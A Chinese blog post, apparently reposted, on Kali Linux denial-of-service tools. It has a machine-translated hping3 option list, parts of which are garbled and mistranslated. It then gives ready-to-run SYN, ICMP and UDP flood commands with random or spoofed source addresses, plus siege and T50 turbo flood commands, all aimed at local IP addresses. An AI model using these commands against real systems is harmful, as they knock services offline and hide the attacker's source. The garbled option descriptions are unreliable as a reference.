kali linux之拒绝服务攻击工具

hping3

几乎可以定制发送任何TCP/IP数据包,用于测试FW,端口扫描,性能测试

-c - 计数包计数
  -i - interval wait(uX表示X微秒,例如-i u1000)
       - -i u10000的快速别名(第二个10个数据包)
       - -i u1000的快速别名(第二个100个数据包)
       --flood尽可能快地发送数据包。不要显示回复。
  -n - 数字数字输出
  -q - 安静
  -I - 接口接口名称(否则为默认路由接口)
  -V - verbose verbose模式
  -D - 调试调试信息
  -z - 绑定ctrl + z到ttl(默认为dst端口)
  -Z - unbind unbind ctrl + z - 为收到的每个匹配数据包发出蜂鸣声


模式
  默认模式TCP
  -0 - RAIP RAW IP模式
  -1 - icmp ICMP模式
  -2 - 表示UDP模式
  -8 - 扫描SCAN模式。示例:hping --scan 1-30,70-90 -S www.target.host
  -9 - 听听模式


IP
  -a - 欺骗欺骗源地址
  --rand-dest随机destionation地址模式。看到那个男人。
  --rand-source随机源地址模式。看到那个男人。
  -t --ttl ttl(默认64)
  -N - id id(默认随机)
  -W --winid使用win * id字节排序
  -r --rel相对化id字段(估计主机流量)
  -f --frag分割更多碎片的数据包。 (可以通过弱acl)
  -x --morefrag设置更多片段标志
  -y --dontfrag set不分片标志
  -g --fragoff设置片段偏移量
  -m --mtu设置虚拟mtu,暗示--frag如果数据包大小> mtu
  -o --tos服务类型(默认为0x00),尝试--tos帮助
  -G --rroute包含RECORD_ROUTE选项并显示路由缓冲区
  --lsrr松散的源路由和记录路由
  --ssrr严格的源路由和记录路由
  -H --ipproto仅在RAW IP模式下设置IP协议字段


ICMP
  -C --icmptype icmp type(默认回显请求)
  -K - icmpcode icmp code(默认为0)
      --force-icmp发送所有icmp类型(默认发送仅支持的类型)
      --icmp-gw设置ICMP重定向的网关地址(默认为0.0.0.0)
      --icmp-ts别名为--icmp --icmptype 13(ICMP时间戳)
      --icmp-addr别名为--icmp --icmptype 17(ICMP地址子网掩码)
      --icmp-help显示其他icmp选项的帮助


UDP / TCP
  -s --baseport基本源端口(默认随机)
  -P --destport [+] [+] <port>目标端口(默认为0)ctrl + z inc / dec
  -k - 保持静止源端口
  -w --win winsize(默认64)
  -O -​​-tcpoff设置假tcp数据偏移量(而不是tcphdrlen / 4)
  -Q --seqnum仅显示tcp序列号
  -b --badcksum(尝试)发送具有错误IP校验和的数据包
                   许多系统将修复发送数据包的IP校验和
                   所以你会得到错误的UDP / TCP校验和。
  -M --setseq设置TCP序列号
  -L --setack设置TCP确认
  -F --fin设置FIN标志
  -S --syn设置SYN标志
  -R - 首先设置RST标志
  -P --push设置PUSH标志
  -A --ack设置ACK标志
  -U - 设置URG标志
  -X --xmas设置X未使用标志(0x40)
  -Y --ymas设置Y未使用标志(0x80)
  --tcpexitcode使用最后的tcp-> th_flags作为退出代码
  --tcp-mss启用具有给定值的TCP MSS选项
  --tcp-timestamp启用TCP时间戳选项以猜测HZ /正常运行时间


同项
  -d - 数据数据大小(默认为0)
  -E - 文件中的文件数据
  -e --sign添加'签名'
  -j --dump以十六进制转储数据包
  -J --print转储可打印字符
  -B --safe启用“安全”协议
  -u --end告诉你--file何时达到EOF并防止倒带
  -T --traceroute traceroute mode(暗示--bind和--ttl 1)
  --tr-stop在traceroute模式下收到第一个非ICMP时退出
  --tr-keep-ttl保持源TTL固定,仅用于监视一跳
  --tr-no-rtt不要在traceroute模式下计算/显示RTT信息,ARS包描述(新的,不稳定的)
  --apd-send发送APD描述的数据包

syn flood攻击

hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.12

hping3 -S -P -U -p 80 --flood --rand-source 192.168.1.12

hping3 -SARFUP -p 80 --flood --rand-source 192.168.1.12

icmp flood攻击

hping3 -q -n -a 192.168.1.12 --icmp -d 56 --flood 192.168.1.10

udp flood攻击

hping3 -a 192.168.1.12 --udp -s 53 -d 100 -p 53 --flood 192.168.1.10

Siege:http/https压力测试工具,模拟多个用户并发访问请求
 siege -g http://192.168.1.12/xxsec.php / 192.168.1.12


T50
t50 192.168.1.12 --flood --turbo -S --protocol TCP --dport 80
t50 192.168.1.12 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22 

 友情链接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn

猜你喜欢

转载自www.cnblogs.com/Hydraxx/p/10471454.html